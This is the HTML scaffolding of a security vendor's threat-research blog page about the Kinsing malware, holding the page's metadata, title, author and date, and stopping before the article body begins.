<!DOCTYPE html>
<html itemscope itemtype="https://schema.org/Article" lang=en dir=ltr class="js">
<head>

<script data-functionality-name="GOOGLETAGMANAGER">(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-5SFWTH');</script>

<meta charset="utf-8">
<title>Kinsing: The Malware with Two Faces</title>
<meta name="title" content="Kinsing: The Malware with Two Faces">
<meta name="description" content="Lately, we’ve been busy researching the developing field of cloud and container threats. Why focus here? Because, as this technology becomes more popular and continues to evolve, attackers are...">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta name="generator" content="Uberflip">
<meta name="uberflip:hub_id" content="108540">
<meta name="application-name" content="Kinsing: The Malware with Two Faces">
<meta name="msapplication-starturl" content="https://www.cyberark.com/resources/">
<meta itemprop="name" content="Kinsing: The Malware with Two Faces">
<meta itemprop="description" content="Lately, we’ve been busy researching the developing field of cloud and container threats. Why focus here? Because, as this technology becomes more popular and continues to evolve, attackers are...">
<meta itemprop="image" content="https://www.cyberark.com/wp-content/uploads/2021/03/Kinsing-Malware-Threat-Research.png">
<meta itemprop="datePublished" content="2022-03-03">
<meta itemprop="dateModified" content="2022-03-03">
<meta itemprop="headline" content="Kinsing: The Malware with Two Faces">
<meta itemprop="mainEntityOfPage" itemscope itemType="https://schema.org/WebPage" itemid="https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces" />
<meta property="og:type" content="article">
<meta property="og:title" content="Kinsing: The Malware with Two Faces">
<meta property="og:url" content="https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces">
<meta property="og:description" content="Lately, we’ve been busy researching the developing field of cloud and container threats. Why focus here? Because, as this technology becomes more popular and continues to evolve, attackers are...">
<meta property="og:image" content="https://www.cyberark.com/wp-content/uploads/2021/03/Kinsing-Malware-Threat-Research.png">
<meta property="og:image:width" content="500">
<meta property="og:image:height" content="272">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://www.cyberark.com/wp-content/uploads/2021/03/Kinsing-Malware-Threat-Research.png">
<meta name="twitter:title" content="Kinsing: The Malware with Two Faces">
<meta name="twitter:description" content="Lately, we’ve been busy researching the developing field of cloud and container threats. Why focus here? Because, as this technology becomes more popular and continues to evolve, attackers are...">
<meta name="twitter:site" content="@CyberArk">
<link rel="apple-touch-icon" sizes="57x57" href="https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9ZmF2aWNvbiZ2ZXJzaW9uPTE2MTk3MDAzMzYmZXh0PXBuZyZzaXplPTU3JnNpZz04MmI2ZjM3Y2JjNzMzZjUyOGFhOTA3MWUwYzhmZTI2Nw%253D%253D/favicon.png"><link rel="apple-touch-icon" sizes="72x72" href="https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9ZmF2aWNvbiZ2ZXJzaW9uPTE2MTk3MDAzMzYmZXh0PXBuZyZzaXplPTcyJnNpZz0zNmNjZjhiNzM5YmJkNWJhYjFlNWFkYjhlOWZiODE3NQ%253D%253D/favicon.png"><link rel="apple-touch-icon" sizes="114x114" href="https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9ZmF2aWNvbiZ2ZXJzaW9uPTE2MTk3MDAzMzYmZXh0PXBuZyZzaXplPTExNCZzaWc9MmY3NDJiY2MzMjM2YzIyMWJkMWFiNjIxODY4NTM4NDA%253D/favicon.png"><link rel="apple-touch-icon" sizes="144x144" href="https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9ZmF2aWNvbiZ2ZXJzaW9uPTE2MTk3MDAzMzYmZXh0PXBuZyZzaXplPTE0NCZzaWc9YmY2YmEyNzRmZjE2OGUwNTBkMGQzMGFiMDliYzA5ZmE%253D/favicon.png"><link rel="icon" sizes="16x16" href="https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9ZmF2aWNvbiZ2ZXJzaW9uPTE2MTk3MDAzMzYmZXh0PXBuZyZzaXplPTE2JnNpZz0yOWIyYTU5ZmExZDQxNjIxMDU3ZmM1Mzk1NmE2OTA1NA%253D%253D/favicon.png"><link rel="icon" sizes="32x32" href="https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9ZmF2aWNvbiZ2ZXJzaW9uPTE2MTk3MDAzMzYmZXh0PXBuZyZzaXplPTMyJnNpZz1hNTBhODYzYzRhZTlkODNlYzI0YjgyNTAxOTJiMmZjMw%253D%253D/favicon.png"><link rel="icon" sizes="96x96" href="https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9ZmF2aWNvbiZ2ZXJzaW9uPTE2MTk3MDAzMzYmZXh0PXBuZyZzaXplPTk2JnNpZz01M2YxN2YwNmMwYjgxMDU3MmYwMmNmMjE3NGMzYWQ0Ng%253D%253D/favicon.png"><link rel="icon" sizes="128x128" href="https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9ZmF2aWNvbiZ2ZXJzaW9uPTE2MTk3MDAzMzYmZXh0PXBuZyZzaXplPTEyOCZzaWc9N2FkNzllMWJlYjQ3MTU3NDA0ZDFlNjM3OTk5YjI0ODA%253D/favicon.png"><link rel="icon" sizes="195x195" href="https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9ZmF2aWNvbiZ2ZXJzaW9uPTE2MTk3MDAzMzYmZXh0PXBuZyZzaXplPTE5NSZzaWc9ZmE4MWYwMmZmOWNhMmE2MGIwNWUyZmJjOGIwNWIzMzQ%253D/favicon.png"><meta name="msapplication-TileImage" content="https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9ZmF2aWNvbiZ2ZXJzaW9uPTE2MTk3MDAzMzYmZXh0PXBuZyZzaXplPTE0NCZzaWc9YmY2YmEyNzRmZjE2OGUwNTBkMGQzMGFiMDliYzA5ZmE%253D/favicon.png"><meta name="msapplication-TileColor" content="#4d4d4d"><!--[if IE]><link rel="shortcut icon" href="https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9ZmF2aWNvbiZ2ZXJzaW9uPTE2MTk3MDAzMzYmZXh0PWljbyZzaWc9N2U4ODlkYWVhMzU5MWFlMTI4YjQ4ZWM0OGVkZmRkODc%253D/favicon.ico"><![endif]-->
<link rel="canonical" href="https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces" />
<link href="https://fonts.googleapis.com/css?family=Lato%3A300%2C400%2C700%2C900%2C300italic%2C400italic%2C700italic" media="screen" rel="stylesheet" type="text/css"><link rel="stylesheet" type="text/css" href="https://content.cdntwrk.com/js/../css/hubs/hubs.604ab7f142b29812da2c.css"><style>
                body { font-family: 'Lato', sans-serif; }
                h1, h1 a,
                .top-nav .secondary-logo > a,
                .top-nav .secondary-logo > a img,
                .item-next-prev .preview h6,
                .empty-hub-wrapper .empty-hub .display-block h2 { color: #4d4d4d; }
                a, .page-width a,
                .bread-crumbs a,
                .tile.single > a.view,
                .tile .description em { color: #5BC0DE; }
                .large-header { background-color: #5BC0DE;}
                                    .large-header {
                       background-image: url(https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9YmFja2dyb3VuZF9pbWFnZSZ2ZXJzaW9uPTE2MTk3MDAzMzYmc2lnPTZhZmM1ZDNlMGRhOTM3OGM4ODg0MDMyNDhiZTk2NWFi);
                    background-attachment:scroll;                    }
                                    div.description,
                div.description .icon,
                .cta > a.accent-button,
                .item-next-prev .item-next .preview .meta-top .preview-icon,
                .item-next-prev .item-prev .preview .meta-top .preview-icon,
                #header-loading-overlay.hide-splash-state { background-color: #4d4d4d; }
                .entry blockquote { border-left: 10px solid #4d4d4d; }
                .left-nav > li,
                .left-nav > li > a,
                .mobile-nav .exit-bar,
                .mobile-share .exit-bar,
                .search-results-overlay .mobile-search-header,
                .top-nav .search-container .search-toggle.expanded { background-color: #4d4d4d; border-color: #4d4d4d; }
                .top-nav .search-container .search-toggle .search-toggle-inner .search-close span { color: #4d4d4d; }
            </style> 
<style data-for="TILE-FEATURE-RIBBON-APP">
    .tile.single span.icon.star {
        background: #ea8023;
        background-image: none !important;
        border-radius: 0;
        width: 140px;
        text-align: center;
        height: 26px;
        opacity: 1;
        color: #fff;
        transform: rotate(44deg);
        font-size: 12px;
        font-weight: bold;
        box-shadow: 2px 2px 3px rgba(0,0,0,0.25);
        top: 22px;
        right: -34px;
    }
    span.icon.star:before {
        display: block;
        content: "FEATURED";
    }
</style>
<script type='text/javascript' id='ubermenu-js-extra'>
/* <![CDATA[ */
var ubermenu_data = {"remove_conflicts":"on","reposition_on_load":"off","intent_delay":"300","intent_interval":"100","intent_threshold":"7","scrollto_offset":"50","scrollto_duration":"1000","responsive_breakpoint":"1300","accessible":"on","retractor_display_strategy":"responsive","touch_off_close":"on","submenu_indicator_close_mobile":"on","collapse_after_scroll":"on","v":"3.4.1.1","configurations":["cybv2","footer_cta","main"],"ajax_url":"https:\/\/cyberarkstage.wpengine.com\/wp-admin\/admin-ajax.php","plugin_url":"https:\/\/cyberarkstage.wpengine.com\/wp-content\/plugins\/ubermenu\/","disable_mobile":"off","prefix_boost":"","aria_role_navigation":"off","aria_expanded":"off","aria_hidden":"off","aria_controls":"","aria_responsive_toggle":"off","icon_tag":"i","theme_locations":{"primary":"Primary Menu"}};
/* ]]> */
</script>


<link id="onbrand__styles-production" rel="stylesheet" href="//cihost.uberflip.com/cyberArk/master/build/en/en.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.2.0/css/all.min.css" crossorigin="anonymous" />
<link href="https://fonts.googleapis.com/css?family=Open+Sans:300,400&display=swap" rel="stylesheet">
<style>
a, .page-width a {

color: #4d8fcc;
}

.hubs-embedded a:hover, .hubs-frontend a:hover {

color: #4d8fcc;
text-decoration: underline;
}

/*body.single-page .entry-wrapper .entry li {*/
/*    padding-bottom: 5px;*/
/*    list-style: decimal;*/
/*    list-style-position: outside;*/
/*}*/
/*body.single-page .entry-wrapper .entry li:before{*/
/*    margin-left: 3px;*/
/*    }*/

span.custom-cta {
    color: black !important;
    text-transform: none !important;
}

span.privacy-msg,
span.high-value-msg {
    font-size: 12px !important;
    line-height: 18px !important;
}

</style><style>
.source-stream-6824673 table.stacktable.small-only {
    display: none;
}
.source-stream-6824673 table {
    width: 100%;
    font-size: 16px;
    line-height: 20px;
    margin-bottom: 30px!important;
    border-collapse: collapse;
    table-layout: fixedl
}

.source-stream-6824673 .table-bordered {
    border: 1px solid #dee2e6;
}

.source-stream-6824673 .table {
    width: 100%;
}

.source-stream-6824673 .table td, .table th {
    padding: .75rem;
    vertical-align: top;
    border-top: 1px solid #dee2e6;
}

.source-stream-6824673 .table-bordered thead td, .table-bordered thead th {
    border-bottom-width: 2px;
}

.source-stream-6824673 .table thead th {
    vertical-align: bottom;
    border-bottom: 2px solid #dee2e6;
}

.source-stream-6824673 .table-bordered td, .source-stream-6824673 .table-bordered th {
    border: 1px solid #dee2e6;
}

.source-stream-6824673 .table td, .source-stream-6824673 .table th {
    padding: .75rem;
}

.source-stream-6824673 .table-striped tbody tr:nth-of-type(odd) {
    background-color: rgba(0,0,0,.05);
}

.source-stream-6824673 .table-responsive-stack tr {
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-direction: row;
    flex-direction: row;
}


.source-stream-6824673 .table-responsive-stack td, .source-stream-6824673 .table-responsive-stack th {
    display:block;
    /*  flex-grow | flex-shrink | flex-basis   */
    -ms-flex: 1 1 auto;
    flex: 1 1 auto;
    word-break: break-all;
}

.source-stream-6824673 .table-responsive-stack .source-stream-6824673 .table-responsive-stack-thead {
    font-weight: bold;
}

.source-stream-6824673 span.table-responsive-stack-thead {
    font-weight: 600;
}

@media screen and (max-width: 768px) {
    .source-stream-6824673 .table-responsive-stack tr {
    -webkit-box-orient: vertical;
    -webkit-box-direction: normal;
    -ms-flex-direction: column;
    flex-direction: column;
    border-bottom: 3px solid #ccc;
    display:block;
      
   }
}
</style><link rel="stylesheet" id="enlighter-styles-css" href="https://www.cyberark.com/wp-content/themes/understrap-child/includes/enlighter/enlighterjs.min.css?ver=5.4.2" type="text/css" media="all" />
<script type="text/javascript" src="https://www.cyberark.com/wp-content/themes/understrap-child/includes/enlighter/enlighterjs.min.js?ver=5.4.2"></script><style>
@import url('https://fonts.googleapis.com/css2?family=Roboto+Mono&display=swap');
.enlighter-t-bootstrap4 {
	font-family: 'Roboto Mono', monospace;
}
.cyb-inline-code-labs {
	background-color: #f1f1f1;
	font-family: 'Roboto Mono', monospace;
}

.cyb-inline-code-labs-transp {
	font-family: 'Roboto Mono', monospace;
}

#hubs-container .enlighter-default .enlighter-toolbar .enlighter-btn-copy {
	background: url(https://www.cyberark.com/wp-content/uploads/2020/08/copy.svg)
	center no-repeat;
	height: 15px;
	width: 15px
}

#hubs-container .enlighter-default .enlighter-toolbar .enlighter-btn-copy::after {
	content: none;
}

#hubs-container .enlighter-default .enlighter-toolbar .enlighter-btn-raw {
  background: url(https://www.cyberark.com/wp-content/uploads/2020/08/raw.svg)
	center no-repeat;
	height: 15px;
	width: 15px;
	margin-right:15px;
}

#hubs-container .enlighter-default .enlighter-toolbar .enlighter-btn-raw::after {
	content: none;
}

.enlighter-default {
	padding: 30px 0 20px 0;
}

.enlighter-btn-website, .enlighter-btn-window {
	display: none !important;
}

#hubs-container .enlighter-toolbar-bottom.enlighter-toolbar {
	display:none;
}
</style>

<style>
/* Fix word-break on blog item hyperlinks - Added 20201014 - UF RM */
body.single-page.blogpost .entry-wrapper .entry li a {
    word-break: normal;
}

/*Standardize image placement across all Streams from Items in the "Idaptive Releases" blog Stream - Added 20201020 - UF DF*/
body.source-stream-7403365 .entry img {
    display: block;
    margin: 0 auto;
}

</style>
<script src="//assets.adobedtm.com/789d877fe9a8/09207f0a9c44/launch-e8e6adf0fe30.min.js" async></script></head><body class="single-page item-649887751 stream-6824673 source-stream-6824673 enable_vanity_urls lab_permanent_header lab_next_flyout lab_highlight lab_top_menu always_update_uf_conversion_item_id lab_nav_always_top include_fe_item_tags include_item_tags_fe_search load_by_button enable_locale_selector has-search uf-stream-template-default hubs-frontend font-lato">

<noscript><iframe data-functionality-name="GOOGLETAGMANAGER" src="https://www.googletagmanager.com/ns.html?id=GTM-5SFWTH"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>

<div id="top" class="hidden"></div>

<header id="top-header" class="main-hub-header">

<div class="large-header" data-speed="2" data-type="background">
<div class="gradient">
<div class="header-wrapper txt">
<div class="header-main"><div class="primary-logo txt">English – CyberArk Software Inc</div></div>
<div class="header-intro"><h2>Up Your Security I.Q. by Checking Out Our Collection of Curated Resources.</h2></div>
 </div>
<div id="header-loading-overlay"><img id="splash-loader" class="splash-down" alt="loading" src="https://content.cdntwrk.com/img/hubs/ajax-loader-white-2x.gif?v=19a554b579c4" /><img alt="go down" id="splash-chevron" style="display:none" class="splash-down" src="https://content.cdntwrk.com/img/hubs/chevron-down-64x64.png?v=78668873251b" /></div>
</div>
</div>
<div class="top-nav">
<div class="page-width item-level with-cta">
<div class="page-aligner">
<div class="secondary-logo txt"><a href="https://www.cyberark.com/resources/" title="English – CyberArk Software Inc" data-internal="home">English – CyberArk Software Inc</a></div>
<ul class="left-nav desktop">
<li class="menu-home custom-menu-item collapsed  ">
<a href="https://www.cyberark.com/resources/" data-internal="home" data-page-title="Update Your Security I.Q. - CyberArk Resource Center">
Home </a>
</li>
<li class="menu-docs custom-menu-item collapsed  has-children">
<a href="javascript:void(0)">
Products &amp; Services </a>
<div class="sub-menu-arrow"></div>
<ul>
<li>Products &amp; Services</li>
<li class="custom-menu-item " data-collection-id="6426408">
<a href="https://www.cyberark.com/resources/privilege-on-premises" data-page-title="Privilege on-Premises" data-internal="custom">
Privilege On Premises </a>
</li>
<li class="custom-menu-item " data-collection-id="7403353">
<a href="https://www.cyberark.com/resources/cyberark-identity" data-page-title="CyberArk Identity" data-internal="custom">
CyberArk Identity </a>
</li>
<li class="custom-menu-item Cloud Entitlements Manager" data-collection-id="7427482">
<a href="https://www.cyberark.com/resources/cloud-entitlements-manager" data-page-title="Cloud Entitlements Manager" data-internal="custom">
Cloud Entitlements Manager </a>
</li>
<li class="custom-menu-item " data-collection-id="6426411">
<a href="https://www.cyberark.com/resources/vendor-privileged-access-manager" data-page-title="Vendor Privileged Access Manager" data-internal="custom">
Vendor Privileged Access Manager </a>
</li>
<li class="custom-menu-item " data-collection-id="6426414">
<a href="https://www.cyberark.com/resources/conjur-secrets-manager-enterprise" data-page-title="Conjur Secrets Manager Enterprise" data-internal="custom">
Conjur Secrets Manager Enterprise </a>
</li>
<li class="custom-menu-item " data-collection-id="6426417">
<a href="https://www.cyberark.com/resources/endpoint-privilege-manager" data-page-title="Endpoint Privilege Manager​" data-internal="custom">
Endpoint Privilege Manager​ </a>
</li>
<li class="custom-menu-item " data-collection-id="6426420">
<a href="https://www.cyberark.com/resources/cyberark-privilege-cloud" data-page-title="CyberArk Privilege Cloud​" data-internal="custom">
CyberArk Privilege Cloud​ </a>
</li>
<li class="custom-menu-item " data-collection-id="6426423">
 <a href="https://www.cyberark.com/resources/assessment-tools" data-page-title="Assessment Tools​" data-internal="custom">
Assessment Tools​ </a>
</li>
<li class="custom-menu-item " data-collection-id="6426426">
<a href="https://www.cyberark.com/resources/services-support" data-page-title="Services &amp; Support​" data-internal="custom">
Services &amp; Support​ </a>
</li>
</ul>
</li>
<li class="menu-docs custom-menu-item collapsed two-column has-children">
<a href="javascript:void(0)">
Topics </a>
<div class="sub-menu-arrow"></div>
<ul>
<li>Topics</li>
<li class="custom-menu-item " data-collection-id="6426429">
<a href="https://www.cyberark.com/resources/automate-privileged-tasks" data-page-title="Automate Privileged Tasks" data-internal="custom">
Automate Privileged Tasks </a>
</li>
<li class="custom-menu-item " data-collection-id="6426432">
<a href="https://www.cyberark.com/resources/best-practices-for-privileged-access-management" data-page-title="Best Practices for Privileged Access Management" data-internal="custom">
Best Practices for Privileged Access Management </a>
</li>
<li class="custom-menu-item " data-collection-id="6426435">
 <a href="https://www.cyberark.com/resources/meet-audit-and-compliance" data-page-title="Meet Audit and Compliance" data-internal="custom">
Meet Audit and Compliance </a>
</li>
<li class="custom-menu-item " data-collection-id="6426438">
<a href="https://www.cyberark.com/resources/mitigate-risk-with-just-in-time-and-least-privilege" data-page-title="Mitigate Risk With Just-in-Time and Least Privilege" data-internal="custom">
Mitigate Risk With Just-in-Time and Least Privilege </a>
</li>
<li class="custom-menu-item " data-collection-id="6426441">
<a href="https://www.cyberark.com/resources/remove-local-admin-rights-on-workstations" data-page-title="Remove Local Admin Rights on Workstations" data-internal="custom">
Remove Local Admin Rights on Workstations </a>
</li>
<li class="custom-menu-item " data-collection-id="6426447">
<a href="https://www.cyberark.com/resources/secure-application-credentials" data-page-title="Secure Application Credentials" data-internal="custom">
Secure Application Credentials </a>
</li>
<li class="custom-menu-item " data-collection-id="6426450">
<a href="https://www.cyberark.com/resources/secure-cloud-environments" data-page-title="Secure Cloud Environments" data-internal="custom">
 Secure Cloud Environments </a>
</li>
<li class="custom-menu-item " data-collection-id="6426453">
<a href="https://www.cyberark.com/resources/secure-devops-pipelines-and-cloud-native-apps" data-page-title="Secure DevOps Pipelines and Cloud Native Apps" data-internal="custom">
Secure DevOps Pipelines and Cloud Native Apps </a>
</li>
<li class="custom-menu-item " data-collection-id="6426456">
<a href="https://www.cyberark.com/resources/secure-human-privileged-access" data-page-title="Secure Human Privileged Access" data-internal="custom">
Secure Human Privileged Access </a>
</li>
<li class="custom-menu-item " data-collection-id="6426459">
<a href="https://www.cyberark.com/resources/secure-rpa-workloads" data-page-title="Secure RPA Workloads" data-internal="custom">
Secure RPA Workloads </a>
</li>
<li class="custom-menu-item " data-collection-id="6426462">
<a href="https://www.cyberark.com/resources/secure-third-party-vendor-and-remote-access" data-page-title="Secure Third-Party Vendor and Remote Access" data-internal="custom">
Secure Third-Party Vendor and Remote Access </a>
</li>
<li class="custom-menu-item " data-collection-id="7403356">
 <a href="https://www.cyberark.com/resources/secure-workforce-access" data-page-title="Secure Workforce Access" data-internal="custom">
Secure Workforce Access </a>
</li>
<li class="custom-menu-item " data-collection-id="6426465">
<a href="https://www.cyberark.com/resources/threat-research" data-page-title="Threat Research​" data-internal="custom">
Threat Research​ </a>
</li>
</ul>
</li>
<li class="menu-docs custom-menu-item collapsed  has-children">
<a href="javascript:void(0)">
Industry </a>
<div class="sub-menu-arrow"></div>
<ul>
<li>Industry</li>
<li class="custom-menu-item " data-collection-id="6426468">
<a href="https://www.cyberark.com/resources/financial-services" data-page-title="Financial Services ​&amp; Insurance " data-internal="custom">
Financial Services ​&amp; Insurance </a>
</li>
<li class="custom-menu-item " data-collection-id="6426471">
<a href="https://www.cyberark.com/resources/healthcare" data-page-title="Healthcare​" data-internal="custom">
Healthcare​ </a>
</li>
<li class="custom-menu-item " data-collection-id="6426477">
<a href="https://www.cyberark.com/resources/public-sector-government" data-page-title="Public Sector &amp; Government ​" data-internal="custom">
Public Sector &amp; Government ​ </a>
</li>
</ul>
</li>
<li class="menu-docs custom-menu-item collapsed  has-children">
<a href="javascript:void(0)">
Content Type </a>
<div class="sub-menu-arrow"></div>
<ul>
<li>Content Type</li>
<li class="custom-menu-item " data-collection-id="5950137">
<a href="https://www.cyberark.com/resources/analyst-reports" data-page-title="Analyst Reports" data-internal="docs">
Analyst Reports &amp; Research​ </a>
</li>
<li class="custom-menu-item " data-collection-id="7020912">
<a href="https://www.cyberark.com/resources/all-blog-posts" data-page-title="Blog Posts" data-internal="custom">
Blog Posts </a>
</li>
<li class="custom-menu-item " data-collection-id="5950143">
<a href="https://www.cyberark.com/resources/case-studies" data-page-title="Case Studies" data-internal="docs">
Case Studies​ </a>
</li>
<li class="custom-menu-item " data-collection-id="5950146">
<a href="https://www.cyberark.com/resources/ebooks" data-page-title="eBooks" data-internal="docs">
eBooks​ </a>
</li>
<li class="custom-menu-item " data-collection-id="5950149">
<a href="https://www.cyberark.com/resources/infographics" data-page-title="Infographics" data-internal="docs">
Infographics​ </a>
</li>
<li class="custom-menu-item " data-collection-id="6824736">
<a href="https://www.cyberark.com/resources/webinars" data-page-title="Webinars" data-internal="videos">
On-Demand Events &amp; Webinars </a>
</li>
<li class="custom-menu-item " data-collection-id="7699537">
<a href="https://www.cyberark.com/resources/product-announcements" data-page-title="Product Announcements" data-internal="custom">
Product Announcements </a>
</li>
<li class="custom-menu-item " data-collection-id="5950140">
<a href="https://www.cyberark.com/resources/product-datasheets" data-page-title="Product Datasheets" data-internal="docs">
Product Datasheets​ </a>
</li>
<li class="custom-menu-item " data-collection-id="5950152">
<a href="https://www.cyberark.com/resources/solution-briefs" data-page-title="Solution Briefs" data-internal="docs">
Solution Briefs​ </a>
</li>
<li class="custom-menu-item " data-collection-id="6824724">
<a href="https://www.cyberark.com/resources/videos" data-page-title="Videos" data-internal="videos">
Videos </a>
</li>
<li class="custom-menu-item " data-collection-id="5950161">
<a href="https://www.cyberark.com/resources/white-papers" data-page-title="White Papers" data-internal="docs">
Whitepapers​ </a>
</li>
</ul>
</li>
<li class="menu-docs custom-menu-item collapsed  " data-collection-id="7105730">
<a href="https://www.cyberark.com/resources/customer-stories" data-page-title="Customer Stories" data-internal="custom">
Customer Stories </a>
</li>
</ul>
<a class="nav-toggle" href="javascript:void(0)"></a>
<div class="right-side-btns">
<a class="share-toggle" href="javascript:void(0)"></a>
<div class="search-container">
<div class="search-toggle">
<span class="search-icon"><span></span></span>
<span class="search-input"><input type="text" name="q" value="" placeholder="Search" autocomplete="off"></span>
<span class="search-close"><span>&times;</span></span>
</div>
</div>
</div>
</div>
</div>
</div>
</header>



<div class="main clearfix" role="main">
<div id="hubs-container"> <div id="page-type-identifier" data-sharing-url="https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces" data-non-vanity-url="https://www.cyberark.com/resources/h/i/649887751-kinsing-the-malware-with-two-faces" data-metrics-temp-id="stats_temp_item_649887751x94dc114478c22cb106f8245e0d96730ee0fbbaba1550821230ef7e2dbd0128ec16485765768c01ce3aa10ddcffbbf1f51d40a56e3e3f73414f10ad2422f137cadb432d5481" data-page-type="PAGE_TYPE_ITEM" data-item-type="blogpost" data-collection-type="blogs" data-collection-id="6824673" data-item-id="649887751" data-source-collection-id="6824673" data-source-collection-type="blogs" data-item-preview="" data-tags="Threat Research,Threat Research Blog,Blog" style="display:none" data-collection-template="default">
<div itemprop="author" itemscope itemtype="http://schema.org/Person">
<div itemprop="name" content="Aluma Lavi Shaari"></div>
</div>
<div itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
<div itemprop="name" content="English – CyberArk Software Inc"></div>
<div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
<div itemprop="url" content="https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9ZmF2aWNvbiZ2ZXJzaW9uPTE2MTk3MDAzMzYmZXh0PXBuZyZzaXplPTE2JnNpZz0yOWIyYTU5ZmExZDQxNjIxMDU3ZmM1Mzk1NmE2OTA1NA%253D%253D/favicon.png"></div>
</div>
</div> </div>
<div class="page-width item-level with-cta" id="item-content">
<div class="bread-crumbs item-level">
<a class="uf-breadcrumb uf-breadcrumb-home" href="https://www.cyberark.com/resources/" data-internal="home" data-page-title="Update Your Security I.Q. - CyberArk Resource Center">
Home </a>
<span class="uf-breadcrumb-icon">&raquo;</span>
<a class="uf-breadcrumb uf-breadcrumb-stream " href="https://www.cyberark.com/resources/threat-research-blog" data-internal="standard" data-page-title="Threat Research Blog">
Threat Research Blog </a>
<span class="uf-breadcrumb-icon">&raquo;</span>
<span class="uf-breadcrumb uf-breadcrumb-item">Kinsing: The Malware with Two Faces</span>
</div>
<div class="item-data item-contents-with-cta">
<div id="share-item-phone">
<div class="mobile-share">
<div class="exit-bar">
<a class="exit" href="javascript:void(0)">&times;</a>
<span class="title">Share this Article</span>
</div>
<ul>
<li class="facebook"><a data-share="facebook" href="https://www.facebook.com/sharer/sharer.php?u=https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces">Facebook</a></li> <li class="twitter"><a data-share="twitter" href="https://twitter.com/share?text=Kinsing: The Malware with Two Faces&amp;url=https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces">Twitter</a></li> <li class="email"><a data-share="email" href="/cdn-cgi/l/email-protection#764902194b50171b064d0503141c1315024b35191802131802561004191b561b0f563e03145750171b064d1419120f4b351e13151d5619030256011e17025105561e17060613181f181156170256350f14130437041d572a182a183d1f18051f18114c56221e13563b171a0117041356011f021e562201195630171513052a183a1702131a0f5a5601135004050703194d00135614131318561403050f56041305131704151e1f181156021e1356121300131a19061f181156101f131a1256191056151a190312561718125615191802171f18130456021e04131702055856211e0f561019150305561e1304134956341315170305135a56170556021e1f05560213151e18191a19110f56141315191b1305561b19041356061906031a17045617181256151918021f18031305560219561300191a00135a5617020217151d130405561704135858582a182a181e020206054c595901010158150f14130417041d5815191b5904130519030415130559021e041317025b041305131704151e5b141a1911591d1f18051f18115b021e135b1b171a011704135b011f021e5b0201195b1017151305">Email</a></li> <li class="linkedin"><a data-share="linkedin" href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces&amp;title=Kinsing: The Malware with Two Faces&summary=Lately, we’ve been busy researching the developing field of cloud and container threats. Why focus here? Because, as this technology becomes more popular and continues to evolve, attackers are...">LinkedIn</a></li> </ul>
</div>
</div>
<section class="level-three">
<article class="entry-wrapper">
<h1>Kinsing: The Malware with Two Faces</h1>
<div class="meta-wrapper">
<div class="meta-inner">
<div class="meta">
<span class="date">March 3, 2022</span>
<span class="author">Aluma Lavi Shaari</span>
</div>
<div class="share-container"> <ul class="share-item type-blogpost four">
<li class="share-text">Share this Article</li> <li><a class="facebook on" data-share="facebook" href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.cyberark.com%2Fresources%2Fthreat-research-blog%2Fkinsing-the-malware-with-two-faces">Facebook</a></li> <li><a class="twitter on" data-share="twitter" href="https://twitter.com/share?text=Kinsing%3A%20The%20Malware%20with%20Two%20Faces&amp;url=https%3A%2F%2Fwww.cyberark.com%2Fresources%2Fthreat-research-blog%2Fkinsing-the-malware-with-two-faces&amp;via=CyberArk">Twitter</a></li>
